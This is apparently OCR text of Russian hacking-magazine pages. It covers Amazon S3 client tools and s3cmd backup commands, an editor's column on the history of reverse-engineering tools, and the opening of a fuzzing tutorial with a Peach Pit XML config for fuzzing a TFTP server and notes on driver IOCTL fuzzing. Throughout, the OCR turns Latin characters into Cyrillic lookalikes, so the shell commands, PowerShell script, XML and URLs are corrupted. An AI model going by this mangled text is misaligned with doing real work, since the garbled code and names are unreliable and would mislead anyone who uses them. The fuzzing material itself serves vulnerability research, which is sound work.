одной стороны локальные диски, с другой — облако. Если 
попробовать переместить файл или папку, плагин ска- 
жет, что для этого предварительно нужно создать ЬискеР 
Объект в облаке не может болтаться сам по себе и обяза- 
тельно должен быть привязан к одному из «ведер». Сам 
процесс создания Ьискеі мало чем отличается от создания 
каталога на локальном диске, о правилах составления 
имени подскажет сам плагин. В целом надо использовать 
те символы, которые могут быть в ОВР — как я уже сказал, 
имя «ведра» далее используется для составления ОВР 
для доступа файла извне. Пробуем залить файл — полу- 
чилось. Выберем целую папку — нет проблем, файлы по 
очереди заливаются с использованием очереди. Теперь 
посмотрим, доступны ли файлы извне. Через контекстное 
меню какого-нибудь файла нажмем «Сору ИВР» и попро- 
буем открыть полученную ссылку в браузере ( Ыір://хакер. 
зЗ.атагопаѵуз.сотМооІу/зсаппег.гір ). Облом: 

АссеззБепіесІАссезз Бепіе<ТЗІБ32В892АЕ10В4ІСБО 
ЗХРсІВтіхг 7 СкапМАІСоУЬаВкдсТф Оу 8 1 9 3 ОдТБзХХ Бдт 
3 ЗзпгЕ2 РО<ііА(ХіѵС)9 

Доступ запрещен. Необходимо опять же через контекст- 
ное меню изменить права доступа («ЕсІіР АСЕ») и сделать 
файл доступным для всех — после этого все сразу зара- 
ботает. 53Еох позволяет выполнять все элементарные 
действия с файлами и даже поддерживает простейшую 



синхронизацию каталогов. Еще один плюс в том, что 
плагин кроссплатформенный и может быть установлен к 
браузеру под любой ОС. С другой стороны, когда начина- 
ешь работать с Атагоп 53 более плотно, приходит пони- 
мание, что функционала у плагина недостаточно. Каково 
было мое удивление, когда я хотел переименовать файл, 
а такой возможности... не оказалось. Нет и поддержки 
более дешевого хранилища ВВ5, о котором мы говорили. 

В общем, с этого момента я стал использовать инструмент 
посерьезнее — СІоисІВеггу Ехріогег І сІоибЬеггѵІаЬ.сот ). 



> Ііпкз 

Бесплатный онлайн 
сервис для работы 
с Атагоп 53: 

ѵѵѵѵѵѵ.зЗІпп.сопп 



ПРОКАЧИВАЕМ СОФТ 

Единственный недостаток этой утилиты в том, что работа- 
ет она только под виндой. Зато в остальном это чрезвы- 
чайно мощный инструмент для работы с 53-хранилищем. 
Во-первых, тут есть вкладки: можно даже одновременно 
работать с разными учетными записями на Атагоп 53, 
если необходима такая возможность. Во-вторых, про- 
грамма не впадает в стопор, когда нужно залить на 
сервер многогигабайтный файл (в 53Еох этого лучше не 
делать!]. То же самое касается ситуации, когда в облако 
требуется залить огромное количество файлов: все, 
будь то совсем маленькие или очень большие, аккуратно 
встанут в очередь и будут передаваться на сервера 53. 
В-третьих, СІоисІВеггу Ехріогег поддерживает быстрое 
копирование и перемещение объектов между аккаун- 
тами и ЬискеРами внутри Атагоп 53. То есть не надо 
сначала закачивать файлы себе, а потом опять заливать 
на сервер — все происходит прозрачно внутри обла- 
ка. Естественно, поддерживается переименовывание 
объектов (почему ее нет в 53Еох, мне сложно понять]. 
В-четвертых, ты можешь расшарить объекты или даже 
целые «ведра» для других пользователей Атагоп 53. С 
помощью АСІ_-листов четко настраиваются все полити- 
ки безопасности. Кстати, когда создаешь ссылку, ино- 
гда очень полезно выбрать протокол ВііТоггепІ (опция 
«депегаіе Ьіііогепі игі»]. В этом случае файл из облака 
будет скачиваться через ТоггепРы. Это очень классная 
фишка Атагоп 53, которая пригодится, чтобы сэкономить 
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ПГТПнСИн 



Е<ІИ: Атэгоп 53 Ассоипі 





БреаІѴ пеѵѵ ѵаіиек ІЬг ехіайпд Атагоп 53 ассоипі 



Оі5рІэу пате: 


®іерап.іІуіп 


1 


Ассезз кеу: 


ШАІЕРХР 


взход 



Зесгеі кеу: 



АізсиіікіЕ«кхі»іКЕиіиЕіі.іікх]ікліі 



УМ 551 



ТеаіСоппесЬоп 



Оол'І Ьаѵе ап Атагол 53 ассоипі ? 

Сгеаів ап ассоипі - И чѵіІІ Іаке іиаі а Ге* ппігнйее 1 



ОК 



СапсеІ 






Авторизация для доступа к 5з-хранилищу 



трафик. Пользователи при таком раскладе 
будут выкачивать объект не только из облака, 
но и с компьютеров друг друга. Мало того, 
для любой сгенерированной ссылки можно 
обозначить срок годности, после которого 
она будет невалидна. И что важно: при всех 
плюсах СІоибВеггу Ехріогег остается бес- 
платным для всех пользователей. Впрочем, 
разработчики знали, как можно заставить 
пользователей платить. В ее старшем брате, 
за который просится $40, есть еще несколь- 
ко умопомрачительных фишек. Во-первых, 
это поддержка шифрования и версион- 
ности, которые предлагаются Атагоп 53. 

А, во-вторых, возможность использования 
РоѵѵегзНеІІ-скриптов для автоматизации 
практически любых задач. Попробуем 
автоматизировать закачку содержимого с:\ 
ѵѵогкбаіа в Ьискеі «хакер», причем имя 
новой директории в облаке будет генерить- 
ся автоматически, исходя из текущей даты 
(201 0_06_0 1 — такой формат удобнее для 
СОрТИрОВКи): 

$пем_ко1с!ег_когтак = Сек-Баке 
-икогтак "%У_%т_%сі" 

$зЗ = Сек-С1оис133Соппескіоп -Кеу 
$кеу -Зесгек $зесгек 
$с!езкіпакіоп = $зЗ I Зеіеск- 
СІоисІЕоІсІег -ракк "хакер" I Асісі- 
СІоисІЕоІсІег $пеѵ^_По1сЗег_Погтак 
$згс = Сек- 



СІоисіЕіІезузкетСоппескіоп | 
ЗеІеск-СІоисІЕоІсІег -ракк " с : \ 
ѵ\гогкс!ака\ " 

$згс I Сору-СІоисІІкет $сІезкіпакіоп 
-кіікег "*" 

Отличный способ выполнить умный бэкап. 
Впрочем, для резервного копирования в 
облако 53 есть специализированные про- 
граммы. Разработчики СІоибВеггу Ехріогег 
предлагают очень простое и толковое, но, к 
сожалению, платное решение — СІоибВеггу 
Опііпе Васкир. А лично я использую 
53 Васкир [ ѵѵѵѵѵѵ.таіике.сот/зокѵѵа ге/ 
зЗ-Ьаскир ). правда, и тут беда. Программа 
постепенно приближается к официальному 
релизу, и разработчики грозятся сделать ее 
платной. Во время бэкапа важно помнить о 
максимальном ограничении файла для 53 — 

5 Гб. К счастью, обе утилиты могут использо- 
вать компрессию так, чтобы уложиться в это 
ограничение. 

зз и иш 

Теперь пару слов о том, как я делаю бэкап со 
своих линуксовых серверов. По мне лучше 
всего подходит консольный зЗ-клиент зЗстсІ 
( зЗіооІз.огд/зЗстсІ ). В ІІЬипІи он входит в 
стандартный репозитарий, поэтому устанав- 
ливается через менеджер пакетов: арі-деі 
іпзіаіі зЗстсІ. Для того чтобы настроить 
клиент, ввести пару ключей, пароль для шиф- 



Генерируем .Іоггепі-ссылку 



рования, а также указать другие параметры 
работы с облаком, необходимо запустить кон- 
фигуратор: зЗстб — сопбдиге. Настройщик 
проверит соединение, и если они правиль- 
ные, предложит сохранить их в конфигура- 
ционный файл. Теперь можно приступать к 
работе. Классно, что в режиме бэкапа зЗстсІ 
очень сильно напоминает гзупс, поэтому 
запускается похожим образом: 

зЗсшсі --асі-ргіѵаке --Ьискек- 
1осакіоп=ЕБ --диезз-шіше-куре 
--сіеіеке-гетоѵесі зупс /Іосаі/ 
Ьаскир/ зЗ : / /хакер/ЬаскиркготзегѵІ 

Ключ «--асі-ргіѵаіе» означает, что доступ 
к файлам будет только у нас. С помощью 
«— ЬискеЫосабоп-ЕІІ» мы указываем 
регион (в данном случае Европу, а точнее 
Ирландию). Опция «--диезз-тіте-іуре» 
обозначает, что МІМЕ-тип содержимого 
будет подбираться автоматически, исходя 
из расширения файла. А чтобы файлы сами 
удалились из 53-хранилища, если они исче- 
зают в локальной папке, используется ключ 
«--беіеіе-гетоѵеб». Итак, бэкапы есть. Что 
надо сделать, чтобы данные восстановить из 
резервной копии? Достаточно одной команды: 

зЗстсізупсзЗ : / /хакер/ 
Ьаскиркготзегѵі/ Іосаі /Ьаскир/ 

Чтобы просо посмотреть, что хранится в 
ЬискеЕе, достаточно ключа Із: 

зЗстсІ Із зЗ: //хакер 

Тут я учитываю, что Ьискеі с именем хакер у 
нас уже есть. Но если его необходимо соз- 
дать, то это опять же очень легко реализуется 
через зЗЬоіз: 

зЗстсІ --асі-ргіѵаке --Ьискек- 
1осакіоп=ЕБ тЬ зЗ: //хакер 

Добавляем команду на бэкап в сгоп и 
наслаждаемся самым надежным бэкапом, 
который только можно представить. Кто ска- 
зал, что использовать облачные технологии 
сложно и подсилу только разработчикам? 
Пфф, чепуха, ц-ц 
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КОЛОНКА РЕДАКТОРА 

10 ЛЕТ КЕѴЕП8Е-ЕНБІЫЕЕШНС 

На днях мне попался наш старый видеоурок, демонстрирующий, как можно быстро снять 
простейшую защиту с программы, используя единственную утилиту - Ш2Ра$т. 
Удивительно, как все изменилось с тех пор. Если вернуться в 2000 год, то Ш20а§ш 
и ТигЬо йеЬиддег считаются чуть ли не лучшими программами для реверсинга. За десять 
лет появились новые тренды и технологии, которые в то время даже не снились. 



КОНЕЦ 50РТІСЕ. Уже много лет назад, 
по сути, существовал один единственный 
дебаггер, который использовался для ревер- 
синга — ЗоШСЕ. Поистине замечательный 
отладчик, написанный компанией ІЧиМеда, 
позволял дебажить как приложения в поль- 
зовательском окружении, так и те, что рабо- 
тали внутри ядра. Увы, любимый «айс» так и 
не смог удержать лидерство, сдав свои пози- 
ции ОИуОЬд [ мѵѵѵѵ.оІІѵсІЬд.сІе ) и ѴѴіпОЬд [ ѵѵѵѵѵѵ. 
тісгозоЮсот ]. Да, остались те, кто довольно 
успешно использует 5оШСЕ и сейчас, но... 
Используя устаревший софт, далеко не уйти. 
Маленький пример: в начале 2000-х мало 
кто задумывался об ІЛЧІССЮЕ — сейчас же 
он используется повсеместно. Разработчику 
того же ОИуйЬд пришлось приложить немало 
усилий, чтобы, наконец, сделать корректное 
распознавание ІЛЧІССЮЕ строк в 2.0 версии 
отладчика, которая никак не выйдет из стату- 
са бета-версии. 

ВИЗУАЛЬНЫЕ ГРАФЫ ПОТОКОВ ДЛЯ 
АССЕМБЛЕРНОГО КОДА. Дол гое время для 
понимания управляющих команд приходи- 
лось разбираться в линейном потоке іб-еізе 
условий и циклов. Красивая раскраска кода, 
подсветка циклов — все это придавало 
удобство, но незначительное. Что действи- 
тельно добавило в процесс реверсинга 
наглядности и простоты, так это возмож- 
ность просмотра ассемблерного листинга 
в виде графа, построенного в соответствии 
с разветвлением и циклами программы. 
Новая фишка впервые была представлена в 
ЮА Рго 4.17 (а это июнь 2001 года], а, начи- 
ная с версии 5.0, обрела свой современный 
вид. 



ИСПОЛЬЗОВАНИЕ РѴТНОМ'А ДЛЯ АВТОМА- 
ТИЗАЦИИ. Опять же, если вернуться в 2000 
год, большинство утилит отличались узкой 
специализацией и были практически не рас- 
ширяемы. Все изменилось с ростом популяр- 
ности скриптового языка Рубіо п и появлени- 
ем 5ѴѴІ0 — технологии, позволяющей про- 
граммистам легко встраивать в свои разра- 
ботки интерпретатор Рубіо п и предоставлять 
основанный на Рубіоп'е АРІ. Тут же появился 
проект ЮАРубіоп [ б-боте.пеі/ібарѵбіоп ] 

— плагин для ЮА Рго, который позволял 
обращаться к ЮА АРІ прямо из Рубіоп. Позже 
появились РуОЬд [ ребгат.гебЫѵе.сот/РѵРЬд ] 
и ребіе [ собе.доодіе.сот/р/ребіе ]. Сейчас 
Рубіоп является стандартом де-факто в этой 
области, и многие утилиты, начиная от ЮА Рго 
и заканчивая Іттипбу РеЬиддег или ВіпІЧаѵі, 
поддерживают скриптинг на Рубіоп. 

БИНАРНОЕ СРАВНЕНИЕ. М ного лет назад 
в чью-то умную голову пришла гениально 
простая идея: если сравнить непатченную 
версию файла с той, в которой исправили 
какую-то ошибку, то можно легко выявить уяз- 
вимый код и быстро найти уязвимость. Вскоре 
появились как бесплатные, так и серьезные 
коммерческие реализации этой идеи. Одной 
же из наиболее продвинутых утилит в этой 
области по-прежнему считается ВіпОііб [ ѵѵѵѵѵѵ. 
іттипіІѵзес.сот/ргобисЩ-ЫпбіЮзбІітй ). 
Впрочем, все подобные решения работают 
по одному и тому же принципу: после того, 
как два входных файла дизассемблированы, 
для каждой функции в файле А находится 
ее соответствие в файле В, а все локальные 
изменения внутри функции отображаются для 
пользователя. 



ПОЯВЛЕНИЕ НАСТОЯЩЕГО ДЕКОМПИ- 
ЛЯТОРА. Любой декомпилятор образца 
начала 2000-х годов — скорее игрушка, 
чем полезный инструмент. Однако в 2007 
году команда ЮА Рго зарелизила деком- 
пилятор Нех-Рауз [ ѵѵѵѵѵѵ.Ьех-гаѵз.сопп ]. 
который, наконец-то, мог похвастаться 
достойными алгоритмами декомпиляции. 
Из самых ожидаемых фишек в новой 
версии программы — многообещающая 
поддержка процессоров АРМ, которая 
позволит декомпилировать приложения 
для мобильных устройств. 

КОЛЛЕКТИВНАЯ РАБОТА РЕВЕРСЕРОВ. 

Еще несколько лет назад было сложно 
представить специалистов по реверс- 
инжинирингу, эффективно работающих 
совместно над одним и тем же проектом. 
Для этого банально не было работающей 
технологии, позволяющей обменивать- 
ся большим количеством отладочной 
информации между программами. Сейчас 
команды реверсеров могут взять на воо- 
ружение такие утилиты как СоРаЬРЕаІе 
[ ѵѵѵѵѵѵ.ібаЬоок.сот/соиаЬгеаЫ для ЮА 
Рго или ВіпСгоѵѵсІ [ ЬіпсгоѵѵсЮѵпатісз. 
сот ]. 

Не удивлюсь, если скоро софт для ревер- 
синга будет продаваться как 5аа5, то 
есть не в виде отдельно устанавливаемой 
программы, а в виде сервиса, которым 
ты сможешь пользоваться по инету. Что 
будет еще лет через десять? Сложно даже 
загадывать. 2020 — даже цифра сама по 
себе страшная, не говоря уже о мыслях и 
технологиях, которые нас ждут :). т 
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РС_20ЫЕ 



Степан «51ер» Ильин іѵѵіиег.сот/5Іера1і| 






И 



ФАЗЗИНГ I 

ФАЗЗИТЬ, ФАЗЗЕР 

Ищем уязвимости в программах, сетевых 
сервисах, драйверах 

Каждый год в Канаде на конференции СапЗесѴѴезІ проходит конкурс РѴѴЫ20ѴѴЫ 
по поиску багов с современных ОС и браузерах. За каждый успешный сплойт 
предлагается серьезное вознаграждение. И каждый год от участников, имею- 
щих готовые решения, нет отбоя. Для поиска критических уязвимостей в столь 
популярном софте есть много техник и ноу-хау, но большинство из них строятся 
на такой простой технике как фаззинг. 




ермин Ри 22 Іпд появился еще в 1988 
году в работе «ТЬе Ригг Оепегаіог», 
опубликованной Бартом Миллером. 
Именно в эту светлую голову впервые 
пришла идея подсовывать программе 
заведомо некорректные и зачастую вообще 
случайные данные, отлавливая ситуации, 
когда та не сможет их обработать и вылетит. 
Эффективность такого подхода до сих пор 
велика. Точки ввода данных в программу 
могут быть самые разные: текстовая строка, 
введенная через графический интерфейс, 



бинарные данные из файла или, например, 
значение поля в каком-нибудь сетевом 
запросе. Вместо программы может быть 
драйвер, АсбѵеХ-компонент или, например, 
ЗѴѴЕ-приложение. В той или иной мере 
фаззинг сейчас является одним из наиболее 
эффективных средств выявления проблем 
безопасности кода. 

НТО ТАКОЕ ФАЗЗИНГ? 

В зависимости оттого, где осуществляется 
манипуляции с данными, фаззинг разделя- 



ется на множество категорий. Один из самых 
простых видов — файловый фаззинг, подразу- 
мевающий, что некой программе предлагает- 
ся открыть некорректно составленный файл. 
Возьмем, к примеру, прогу для просмотра 
картинок. Если взять ЧРЕО-файл и интерес- 
ным образом поменять несколько байтов, то 
эта программа вполне возможно выругается: 
«Что это ты мне подсунул?». А, возможно, 
вообще не сможет его переварить и вылетит, 
к примеру, с проблемой переполнения буфера. 
Значит, ее теоретически можно расковырять, 
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доведя дело до рабочего эксплойта. Если 
говорить о способе манипуляции с данными, 
то фаззинг распределяется на генерацию и 
мутацию. Генерация — это случайным обра- 
зом придуманный набор байтов, который 
подсовывается той же проге для просмотра 
картинок со словами: «Это на самом деле 
бРЕб-файл, читай его». Мутация — прием 
намного более изящный, подразумеваю- 
щий внесение изменений в «хороший», то 
есть вполне корректный файл. Если в случае 
с файловым фаззингом еще можно исполь- 
зовать «генерацию», то в таких вещах, как 
сетевые протоколы, имеет смысл применять 
исключительно подход мутации. Более того, 
крайне желательно иметь представление, за 
что отвечает то или иное поле пакета и наме- 
ренно манипулировать с теми данными, кото- 
рые могут быть некорректно обработаны. В 
зависимости от интеллекта, фаззеры бывают 
глупые и умные: 

• Глупый (сіитр) фаззер ничего не знает о 
структуре файлов. Если говорить о сетевых 
протоколах, то единственное, что он может 
сделать — это изменить несколько байтов в 
исходном пакете и отправить его в надежде, 
что это может вызвать сбой. 

• Умный (зтагі) фаззер имеет некоторое 
представленные о структуре данных. Вместо 
того, чтобы полностью надеяться на удачу, он 
может играться только с теми данными, кото- 
рые отвечают, например, за размер буфера. 
Или подставлять в поля такие значения, кото- 
рые заведомо, с учетом известного формата, 
будут некорректными. 

ФАЗЗИМ ФАЙЛЫ 

Одна из простейших утилит для реализации 
глупого фаззинга — МіпіЕи тг [ мѵууѵ.тісгозоіі 
сот ). Проект разработан внутри Місгозоіі: для 
тестирования своих собственных проектов. 



Дело в том, что использование фаззеров 
является обязательным этапом методологии 
50Б (Эесигііу Оеѵеіортепі Ыіюсусіе], принятой 
в МісгозоТС для разработчиков безопасного 

Эффективный файловый фаззер 



кода, включающей помимо прочего обильное 
іюгг-тестирование. Міпіі ит.7. можно натравить 
на любое приложение; главное, чтобы в каче- 
стве параметра для запуска оно воспринима- 
ло указание на файл, который ему необходимо 
открыть (скажем, ѵѵіпѵѵогб.ехе Іез1:_5атрІ.е. 
бос). Для начала работы необходимо набрать 
несколько образцов «правильных» файлов 
и положить их каталог, обозначенный как 
Тетріаіе біез, а также выбрать приложение 
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Составляем РеасІіРіІ для «умного» фаззинга 



для проверки, указав формат параметров для 
его запуска. Когда ты нажмешь на кнопку 
51а гі; Ри 22 Іпд, программа возьмет один из 
образцов, изменит некоторые байты внутри 
него (количество изменяемых данных зави- 
сит от параметра Аддгеззіѵепезз] и скормит 
его исследуемому приложению. Если тестиру- 
емая программа не вылетит через некоторый 
таймаут (по умолчанию 2 секунды], значит, 
тест пройден успешно. 

Приложение будет закрыто, и начнется 
следующая итерация проверки. Если же 
во время тестирования программа выле- 
тит (бинго!), то для анализа у тебя будет, 
во-первых, файл-образец, который вызвал 
сбой при открытии, а, во-вторых, сгазб-файл 
с дампом программы. Для большего удобства 
Міпііигг легко прикручивается в Ѵізиаі ЗіисІ іо, 
позволяя запускать ^^-тестирование прямо 
из среды разработки через меню «Тооіз 
МіпіЕигг». Впрочем, если по каким-то при- 
чинам МіпіЕигг тебе не подойдет, то можно 
попробовать другой инструмент для битЬ- 
фаззинга — ЕіІеЕигг ( Іабз.ібеіепзе.сот/ 
зоИѵѵагеЛиггіпд.рЬр ). который разработан 
не МісгозоЛ, а известной зесигііу-командой 
Юеіепзе ЕаЬз. 

ФАЗЗИМ ПРОТОКОЛЫ 

Если МіпіЕигг — это очень простой (хотя 
и эффективный) битр-фаззер, то проект 
Реасб ( реасЫиггег.сот . в переводе — пер- 
сик], разработанный Майком Эддингтоном 
— это уже мощное решение для зтагі- 
фаззинга, поддерживающее как режим 
мутации, так и генерации. Для проведения 
умного фаззинга программе необходимо 



знать структуру данных, с которыми она 
будет экспериментировать. Поэтому на 
вход фаззера подаются так называемые 
РеасЬРіЕы («косточки от персика») — спе- 
циальные ХМИ-конфиги, в которых задается 
структура данных, описание взаимоотноше- 
ний между различными ее элементами, а 
также подходы для реализации мутаций. В 
отличие от Міпби гг, Реасб может фаззить не 
только файлы, но и сетевые сервисы, РРС, 
С0М/0С0М, ЗОИ-хранимые процедуры и 
многое другое. Правда, такая универсаль- 
ность приводит и к некоторым трудностям в 
использовании. 

Сразу предупреждаю: это не та программа, 
которую запускаешь и сразу понимаешь, что 
к чему. Чтобы внести ясность, предлагаю 
разобраться с Реасб на конкретном приме- 
ре, но вместо фаззинга файлов обратиться 
к другой области, а именно — поиску уязви- 
мостей в сетевых сервисах. Для успеха при- 
дется дополнительно установить ѴѴіпОВб 
в качестве отладчика, а также снифер 
ѴѴігезбагк и драйвер ѴѴіпрсар, чтобы иметь 
возможность перехватывать сетевые пакеты 
во время фаззинга сетевых протоколов. 
Любой фаззинг в РеасЬ'е начинается с 
создания РеасЬРіС Как я уже сказал, в этом 
ХМИ-файле определяется цель фаззинга, 
описывается структура данных, с которой 
будет работать фаззер, а также определя- 
ются правила манипуляции с ними. Для 
удобства автор фреймворка предлагает 
библиотеку для Ѵізиаі Эіибіо, серьезно упро- 
щающую работу с РеасЬРіЕами, в том числе 
с помощью автодополнения кода. Любая 
«косточка» состоит из нескольких функцио- 



нальных блоков. Чтобы не составлять весь 
файл с нуля, в корневом каталоге фаззера 
есть файл-шаблон Іетріаіе.хті, который мы 
и возьмем за основу. 

Важная часть любого РеасЬРіЕа — описа- 
ние модели данных. Именно в этом месте 
мы делаем фаззер «умным», рассказываем 
ему о структуре файле или протокола (раз- 
мерах полей, смещениях и т.д.), с которым 
предстоит работать. Возьмем для примера 
простейший протокол ТЕТР и попробуем 
профаззить запрос на чтение файла (Реаб). 
Если верить РЕС, то выглядит он следую- 
щим образом: 

ТЕТР РАСКЕТ 



I \х0 0\х01 I Рііепаше I О I Мосбе 
I О I 



Получается, что запрос начинается с НЕХ- 
символов «\х00\х01», после которых следует 
название файла и флаги режима передачи 
файла. При этом после полей Еііепате и 
Мобе идут нулевые байты. Итак, задача — 
написать фаззер, который будет играться со 
значением Еііепате. Начнем с создания 
модели запроса в нашем РеасбРіСе в соот- 
ветствии с РЕС: 

<БаЦаМо(іе1 пате= " ШЕрггх" > 

<ВІоЬ пате=" орсосіе" 
ѵа1иеТуре= "кех" ѵа1ие="00 01" 
Цокеп="Цгие" /> 
сЗкгіпд пате=" Іііепате" 
ѵа1ие= " Іііепате . кхк " 
пи1ІТегтіпакес1= " кгие " /> 

<8кгіпд пате= "шосіе" 

ѵа1ие= "ЕЕТА8СІІ " кокеп^'кгие" 
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пи1ІТегтіпаБес1= " Сгие " /> 

</БаБаМосІе1> 

В первой строке модели мы задаем двухбайтный код, 
обозначающий запрос на чтение. Указанный здесь 
параметр Іокеп = 'Чгие" мы будем использовать каждый 
раз, чтобы дать понять Реасб, что это поле остается 
как есть, и его не нужно фаззить. Обрати внимание, 
что в следующей строке, которая описывает поле 
біепате, этого флага как раз нет, и именно поэтому 
фаззер будет манипулировать со значением в этом 
поле (или, другими словами, фаззить]. В последней 
строке описывается поле, обозначающее режим рабо- 
ты. Для полей «біепате» и «тобе» мы подставляем 
флаг пиЦТегтіпаІеб, указывая на то, что после них 
идут нулевые байты-разделители. Обрати внимание, 
что для каждого из трех полей указывается его тип 
(ЫоЬ или зігіпд). Таким образом мы рассказываем 
фаззеру, с каким типом данных он будет иметь дело. 
Понятно, что это очень простая модель, в большин- 
стве случаев с ее составлением придется поработать 
намного плотнее. 

После того, как модель данных готова, необходимо 
описать логику работы фаззера, которая описывается 
в следующем блоке РеасбРіба. Поскольку единствен- 
ное место, где мы будем осуществлять фаззинг — это 
поле біепате, то и логика нас будет очень простая. 
Укажем Реасб'у, что необходимо отправлять данные 
(Асбоп {уре="ои1:риГ], используя ранее описанную 
модель данных «Шрггх»: 

<ЗСаСеМосІе1 паше= " зБаСеІ " 
іпіСіа18СаСе= " ІпіСіаІ " > 

<8СаСе пате= " ІпіСіаІ " > 

<АсСіоп Суре=" оиСриС" > 

<БаБаМос1е1 ге! = " СПСрггх" /> 
</АсСіоп> 



</ЗСаСе> 

</ЗСаСеМосіе1> 

Следующий блок конфигурации фаззера — описание 
агентов. Агенты присоединяют к нужному процес- 
су отладчик и постоянно следят за его состоянием. 

В случае вылета приложения из-за ошибки агенты 
записывают различные детали падения в логфайл, в 
том числе и вызвавший сбой запрос (в случае, если 
речь идет о снифинге сетевого протокола]. 

Для того, чтобы классифицировать падение 
(ЕхрІоіІаЫе, РгоЬаЫу ЕхрІоіІаЫе, РгоЬаЫу N 01 
ЕхрІоіІаЫе, ЕІпкпоѵѵп], разработчик рекомендует 
дополнительно к отладчику ѴѴіпОВС установить пла- 
гин ІехрІоіІаЫе [ тзесбЬд.соберІех.сот ]. Обозначим в 
этом блоке, что будем отслеживать состояние прило- 
жения ТЕТР032 и весь ІбОР-трафик, поступающий на 
69 порт (ТРТР): 

<АдепС паше= "КешоСеАдепС " 1осаСіоп= "ЬССр : / /1 
92. 168.1. 10:9000 "> 

<МопіСог с1азз= " сІеЪиддег . ДОіпйоотзБеЪидЕпдіпе " > 
<Рагат пате= " Зегѵісе " ѵа1ие= " ТЕТРБ32 " /> 
</МопіБог> 

<МопіБог с1азз= "пеСмогк . РсарМопіБог " > 

<Рагат паше= " ІіІСег " ѵа1ие="ис1р рогБ 69" /> 
</МопіБог> 

</АдепБ> 

Вот теперь почти все готово. Осталось связать между 
собой модель данных, логику и агентов, объединив их в 
единое целое — веси ігуб -тест . У нас будет только один 
тест (для фаззинга поля біепате], но в реальной ситуа- 
ции можно написать столько тестов, сколько необходи- 
мо. По сути, нужен один тест для каждого описанного 
блока с моделью данных. 




> СІѴСІ 

Подборка фаззеров 
ждеттебя на нашем 
□ѴО-диске. 







> ѵѵагпіпд 

Информация пред- 
ставлена в ознако- 
мительных целях. 
Использование 
ее для противоза- 
конных действий 
может обернуться 
уголовным пресле- 
дованием. Ни автор, 
ни редакция за такие 
последствия ответ- 
ственности не несут. 
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Лог ІОСТЬ Риггег 



<Тез^ паше= " ^^^рггх" > 

<Адеп1і ге^= " КетоІіеАдепІі " /> 
<81:а1:еМо<іе1 геІ = " зЬаЪеІ " /> 
<РиЫізЬег с1азз= "исір . ІІсір" > 

<Рагаш паше="ЬозР" 
ѵа1ие="192. 168. 1.10" /> 

<Рагат паше= "рогР " ѵа1ие="69" /> 
</РиЫіз1іег> 

</ТезР> 

После «риЫізЬег» указывается, каким 
образом будут передаваться данные. 
Поскольку ТРТР работает по ИОР- 
протоколу, то его мы и используем при 
составлении теста. Последний блок, 
который необходимо изменить в файле- 
шаблоне — это блок для запуска фаззера 
(« Р и п »] . Здесь определяется, куда ты 
хочешь сохранить логи с результатами и 
какие тесты хочешь провести: 

<Кші паше=" Бе^ашІСКип" > 

<Ьоддег с1азз= " Іоддег . РіІезузСеш" > 
<Рагаш паше= "раСЬ" ѵа1ие= " Іодз " /> 
</Ьоддег> 

<ТезР геР=" РПСрггх" /> 

</Кип> 

</Реас1і> 

Составление «косточек» для РеасЬ'а может 
показаться непростой задачей, и это дей- 
ствительно так. А как иначе объяснить 
фаззеру особенности формата данных и то, 
каким образом ему эффективнее играться 



с теми или иными параметрами? В этом 
и есть смысл умного фаззинга. С другой 
стороны, если прямо сейчас попробовать 
реализовать другой метод того же протокола 
ТРТР (скажем, метод ѵѵгТе], то сразу осозна- 
ешь, что кода потребуется намного меньше 

— большая часть ХМІ_-конфига уже готова. 
Специально для проверки корректности 
РеасЬРТз'ов в состав фаззера входит спе- 
циальный скрипт реасЬѵа ІісІа1;ог. руѵѵ. Если 
валидатор отдаст отмашку на старт фаззера, 
можно запускать РеасЬ: 

реасЬ.ру -а 

реасЬ.ру РТРрТиггег .хші 

Первая команда активирует агентов, а вторая 
позволяет запустить фаззер с использовани- 
ем только что составленного ХМЕ-конфига. 

ФАЗЗИМ ДРАЙВЕРА 

Итак, мы уже разобрались с фаззингом 
файлов, протоколов — теперь попробуем 
использовать фаззинг для поиска ошибок 
в драйверах. Тут надо понимать, что драй- 
веры используются не только для управ- 
ления устройствами, вовсе нет. Многие 
программы устанавливают в систему 
драйвер в качестве посредника для досту- 
па в более привилегированный режим 

— ПіпдО. Прежде всего, это антивирусы 

и утилиты, обеспечивающие (по крайней 
мере, обещающие обеспечить] безопас- 
ность системы. Драйверы, в общем, ничем 



не отличаются от программы в плане без- 
опасности: как и везде, большое количе- 
ство уязвимостей связано с неправильной 
обработкой данных, в особенности тех, 
что поступают в ІНР-запросах. 1/0 гециезі; 
раскеіз ( I Р Р] — это специальные структу- 
ры, использующиеся моделью драйверов 
ѴѴіпбоѵѵз для взаимодействия и обмена 
данными драйверов друг с другом и самой 
системой. Получается, и здесь есть все 
условия для того, чтобы автоматизировать 
поиск уязвимостей. Конечно, инструмент 
тут нужен совершенно особенный, потому 
как обычным фаззерам доступ в недра 
системы закрыт. 

Одна из немногих разработок в этой 
области — ІОСТИ Еиггег ( собе.доодіе. 
сот/р/іосШиггег ). которая изначально 
нацелена на проведение Іиггіпд-тестов, 
манипулируя сданными в ІРР-запросах. 
Программа устанавливает в систему вспо- 
могательный драйвер (не удивляйся, что 
подобную активность антивирус посчитает 
подозрительной], который перехватывает 
вызовы ІЧШеѵісеІоСопІтоІЕіІе, тем самым 
получая возможность контролировать 
все ІНР-запросы от любого приложения к 
драйверам режима ядра. Это нужно пото- 
му, что изначально формат ІРР-запроса 
для конкретного драйвера или программы 
неизвестен. 

А имея на руках перехваченный ІРР- 
запрос, его можно легко изменить — полу- 
чается классический фаззинг с помощью 
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мутации. Проспуфенный ІРР-запрос ничем 
не отличается от оригинального за исклю- 
чением поля с данными, которые заполня- 
ется фаззером псевдослучайным образом. 
Поведение фаззера, лог-файл, названия 
драйверов для спуфинга и другие пара- 
метры задаются с помощью простейшего 
ХМІ_-конфига, который находится в корне 
программы. Но прежде чем рваться в бой, 
необходима некоторая подготовка. 

Из эксперимента с драйверами на рабочей 
машине ничего хорошего не выйдет. Если 
ІОСИ Ринег удастся нащупать слабое 
место в каком-нибудь из драйверов, то 
система легко улетит в В5СЮ, а это едва 
ли прибавит удобства для идентифика- 
ции уязвимости :]. По этой причине для 
использования фаззера нам понадобится 
отдельная виртуальная машина, к которой 
мы подключим удаленный дебаггер ядра. 
Тут честь и хвала МісгозоіТ, которые не 
только смогли сделать толковый отладчик 
ѴѴіпОЬд, поддерживающий удаленный 
дебаггинг, но и распространяют его бес- 
платно. Взаимодействие между гостевой 
системой в ѴМѵѵаге и удаленным отлад- 
чиком ѴѴіпОЬд осуществляется с помощью 
именованного канала (патесі ріре], кото- 
